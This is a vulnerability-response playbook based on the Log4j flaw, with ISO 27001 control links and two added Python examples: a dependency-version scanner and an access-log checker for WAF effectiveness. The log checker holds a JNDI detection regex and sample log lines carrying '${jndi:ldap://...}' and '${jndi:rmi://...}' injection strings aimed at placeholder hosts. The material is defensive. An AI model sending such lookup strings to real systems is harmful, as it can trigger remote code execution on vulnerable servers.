# Context

A vulnerability in a widely used open source library is published. This is based on the Log4j vulnerability, December 2021, [CVE-2021-44228](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228).

Log4j is a Java library maintained by the Apache Foundation, and the most popular logging library for Java. The vulnerability is: user input containing JNDI lookups is accepted, logged and evaluated, making a remote code execution (RCE) attack possible. Disabling logging, while as a rule undesirable, plugs the hole. Source: https://logging.apache.org/log4j/2.x/

This vulnerability allows an attacker to run commands on a web server, unauthenticated (i.e. without needing to log in).

# Steps

## 1. Identifying exposure

- Search your source code repositories for the name of the library.
- Use dependency tools (also called Software Composition Analysis, SCA) to identify indirect use of the affected library, like GitHub's dependency graph, Snyk, [OWASP Dependency-Check](https://owasp.org/www-project-dependency-check/), WhiteSource, etc.
- Not all versions may be affected, so check which version of the library you are using.
- Find out if you are actually deploying the code that uses the vulnerable library; if not, mark the code as "do not deploy". If it is deployed, find out where.

## 2. Stopping the gap

- If the vulnerable code is deployed behind a Web Application Firewall (WAF) or Content Delivery Network (CDN), or if you are using Runtime Application Self-Protection (RASP), add the rules your vendor provides to prevent RCE.
- If your vendor doesn't have rules available, search for them on the internet or write a regex that blocks the attack.
- Monitor to make sure it's working.
- Update/patch the library containing the vulnerability as soon as a fix becomes available.

## 3. If you can't stop the gap

Do an impact analysis and identify a treatment:

- Option 1: Accept the risk, keep monitoring the situation, and spend your efforts on releasing the upgraded version of your software a.s.a.p.
- Option 2: Avoid the risk by shutting down the vulnerable systems immediately. In this example (Log4j), stop logging temporarily.
- Option 3: Mitigate the risk by going through your code base, removing the dependency and commenting out the code that calls it (uncomment it when the upgrade/patch has been applied).

## Relevant ISO 27001 controls

The main control of interest here is [ISO 27001 A 12.6.1 Management of technical vulnerabilities](../Standards/ISO27x/legacy/ISO%2027001%202013/ISO%2027001%20A%2012.6.1%20Management%20of%20technical%20vulnerabilities.md), which ensures timely awareness of vulnerabilities through [ISO 27001 A 6.1.4 Contact with special interest groups](../Standards/ISO27x/legacy/ISO%2027001%202013/ISO%2027001%20A%206.1.4%20Contact%20with%20special%20interest%20groups.md), evaluation of an organization's exposure, and having set [ISO 27001 A 16.1.1 Responsibilities and procedures](../Standards/ISO27x/legacy/ISO%2027001%202013/ISO%2027001%20A%2016.1.1%20Responsibilities%20and%20procedures.md) to enable a quick and effective response.

Stopping the gap:

- [[ISO 27001 A 13.1.1 Network controls]]
- [[ISO 27001 A 13.1.2 Security of network services]]
- [ISO 27001 A 12.5.1 Installation of software on operational systems](../Standards/ISO27x/legacy/ISO%2027001%202013/ISO%2027001%20A%2012.5.1%20Installation%20of%20software%20on%20operational%20systems.md)

Preventative measures:

- [ISO 27001 A 12.6.2 Restrictions on software installation](../Standards/ISO27x/legacy/ISO%2027001%202013/ISO%2027001%20A%2012.6.2%20Restrictions%20on%20software%20installation.md)
- [[ISO 27001 A 14.1.1 Information security requirements analysis and specification]]
- [[ISO 27001 14.2.1 Secure development policy]]
- [[ISO 27001 A 14.2.7 Outsourced development]]
- [ISO 27001 A 18 Compliance](../Standards/ISO27x/legacy/ISO%2027001%202013/ISO%2027001%20A%2018%20Compliance.md) of systems
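Worked example for Step 1 (Identifying exposure), added here and not part of the original page: a scanner that walks a checkout, finds direct declarations of a library in Maven `pom.xml` and Gradle build files (resolving `${property}` versions from the POM), and compares each version against the affected range. The Maven coordinates `org.apache.logging.log4j:log4j-core` are the real ones for Log4j 2; the range bounds `FIRST_AFFECTED` and `FIXED_IN` are placeholders to be filled in from the advisory, and the two build files in `demo()` are constructed sample input. Indirect (transitive) use still needs an SCA tool, as the step says.

```python
"""Scan a source tree for direct declarations of a library and judge each version (Step 1).

Added example, not code from the original page. Transitive dependencies are
out of scope here; use an SCA tool for those.
"""
import re
import tempfile
import xml.etree.ElementTree as ET
from pathlib import Path

# Placeholders: take the exact affected range from the vendor advisory.
FIRST_AFFECTED = "2.0"    # placeholder lower bound (inclusive)
FIXED_IN = "2.99.0"       # placeholder: first fixed version (exclusive)

# Matches 'group:artifact:version' strings in Gradle build files.
GRADLE_DEP = re.compile(r"""['"]([\w.\-]+):([\w.\-]+):([\w.\-]+)['"]""")


def version_key(version):
    """Order versions numerically; a qualifier such as '-beta9' sorts before the final release."""
    main, _, qualifier = version.partition("-")
    numbers = tuple(int(p) for p in main.split(".") if p.isdigit())
    return (numbers, 0 if qualifier else 1)


def is_affected(version, first_affected=FIRST_AFFECTED, fixed_in=FIXED_IN):
    """True/False for a numeric version; None when it cannot be resolved (check by hand)."""
    key = version_key(version)
    if not key[0]:
        return None
    return version_key(first_affected) <= key < version_key(fixed_in)


def scan_pom(text, group_id, artifact_id):
    """Return versions of group:artifact declared in a pom.xml, resolving ${property} references."""
    root = ET.fromstring(text)
    ns = root.tag[1:].split("}")[0] if root.tag.startswith("{") else ""

    def q(tag):  # qualify a tag with the POM namespace, if the file uses one
        return f"{{{ns}}}{tag}" if ns else tag

    properties = {}
    for props in root.iter(q("properties")):
        for prop in props:
            properties[prop.tag.replace(f"{{{ns}}}", "")] = (prop.text or "").strip()

    found = []
    for dep in root.iter(q("dependency")):
        gid = dep.findtext(q("groupId"), "").strip()
        aid = dep.findtext(q("artifactId"), "").strip()
        if (gid, aid) != (group_id, artifact_id):
            continue
        version = dep.findtext(q("version"), "").strip()
        version = re.sub(r"\$\{([^}]+)\}", lambda m: properties.get(m.group(1), m.group(0)), version)
        found.append(version or "<inherited>")  # no version: managed by a parent/BOM, resolve by hand
    return found


def scan_gradle(text, group_id, artifact_id):
    """Return versions of group:artifact declared in a Gradle build file."""
    return [v for g, a, v in GRADLE_DEP.findall(text) if (g, a) == (group_id, artifact_id)]


def scan_tree(root_dir, group_id, artifact_id):
    """Walk a checkout and report (relative path, version, verdict) for every declaration."""
    findings = []
    for path in Path(root_dir).rglob("*"):
        if not path.is_file():
            continue
        if path.name == "pom.xml":
            versions = scan_pom(path.read_text(), group_id, artifact_id)
        elif path.suffix in (".gradle", ".kts"):
            versions = scan_gradle(path.read_text(), group_id, artifact_id)
        else:
            continue
        for v in versions:
            findings.append((str(path.relative_to(root_dir)), v, is_affected(v)))
    return findings


def demo():
    """Scan a small constructed checkout written to a temp dir (sample data, not a real project)."""
    pom = """<project xmlns="http://maven.apache.org/POM/4.0.0">
  <properties><log4j.version>2.14.1</log4j.version></properties>
  <dependencies>
    <dependency>
      <groupId>org.apache.logging.log4j</groupId>
      <artifactId>log4j-core</artifactId>
      <version>${log4j.version}</version>
    </dependency>
  </dependencies>
</project>
"""
    gradle = "dependencies {\n    implementation 'org.apache.logging.log4j:log4j-core:2.99.0'\n}\n"
    with tempfile.TemporaryDirectory() as tmp:
        (Path(tmp) / "svc-a").mkdir()
        (Path(tmp) / "svc-a" / "pom.xml").write_text(pom)
        (Path(tmp) / "svc-b").mkdir()
        (Path(tmp) / "svc-b" / "build.gradle").write_text(gradle)
        return sorted(scan_tree(tmp, "org.apache.logging.log4j", "log4j-core"))


if __name__ == "__main__":
    for path, version, verdict in demo():
        print(f"{path}: {version} -> {'AFFECTED' if verdict else 'unknown' if verdict is None else 'ok'}")
```

A `None` verdict means the version is inherited from a parent POM or BOM and has to be resolved by hand (or by the SCA tool); treat it as exposure until proven otherwise rather than as a clean result.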
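Worked example for Step 2 (Stopping the gap), added here and not part of the original page: the "monitor to make sure it's working" check, run over access-log lines. It URL-decodes each request field, flags entries carrying a JNDI lookup, and reports whether the WAF/CDN rule actually blocked them. The log format and the sample lines are constructed, the hosts use reserved example addresses, and the assumption that a blocked request is logged with status 403 is a placeholder for whatever your vendor returns. Vendor rule sets cover more obfuscated forms than the simple pattern used here.

```python
"""Check whether a WAF/CDN rule against JNDI lookups is catching and blocking requests (Step 2).

Added example, not code from the original page. Log format, sample lines and
the blocked-status value are constructed assumptions.
"""
import re
from urllib.parse import unquote

# Simple lookup prefix, matched after URL-decoding; vendor rules handle further obfuscation.
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)

# Constructed format: ip - - [time] "METHOD path HTTP/x" status size "referer" "user-agent"
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)
BLOCKED_STATUS = 403  # assumption: the WAF answers a blocked request with 403

# Constructed sample log: one benign request, three carrying a lookup in different fields.
SAMPLE_LOG = [
    '198.51.100.7 - - [10/Dec/2021:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [10/Dec/2021:10:00:02 +0000] "GET / HTTP/1.1" 403 0 "-" "${jndi:ldap://lookup.example.invalid/a}"',
    '203.0.113.5 - - [10/Dec/2021:10:00:03 +0000] "GET /search?q=%24%7Bjndi%3Aldap%3A%2F%2Flookup.example.invalid%2Fb%7D HTTP/1.1" 200 1024 "-" "curl/7.79"',
    '203.0.113.5 - - [10/Dec/2021:10:00:04 +0000] "GET /login HTTP/1.1" 403 0 "${JNDI:rmi://lookup.example.invalid/c}" "Mozilla/5.0"',
]


def find_lookup(text):
    """Return the decoded text if it carries a JNDI lookup, else None."""
    decoded = unquote(text)
    return decoded if JNDI_LOOKUP.search(decoded) else None


def review_access_log(lines):
    """Flag requests with a lookup in the path, referer or user-agent, and whether they were blocked."""
    hits = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue  # unparsable line: not this check's job, but worth counting in real use
        for field in ("request", "referer", "agent"):
            if find_lookup(m.group(field)):
                hits.append({
                    "ip": m.group("ip"),
                    "field": field,
                    "blocked": int(m.group("status")) == BLOCKED_STATUS,
                })
                break
    return hits


def rule_effectiveness(lines):
    """Summarise: matched lookups, how many the rule blocked, how many reached the application."""
    hits = review_access_log(lines)
    blocked = sum(h["blocked"] for h in hits)
    return {"matched": len(hits), "blocked": blocked, "passed": len(hits) - blocked}


if __name__ == "__main__":
    for hit in review_access_log(SAMPLE_LOG):
        print(hit)
    print(rule_effectiveness(SAMPLE_LOG))
```

A non-zero `passed` count is the signal to act on: a request carrying a lookup reached the application, so the rule is missing an encoding or a field (here the URL-encoded query string) and needs extending, or the request should be traced in the application logs as a possible incident.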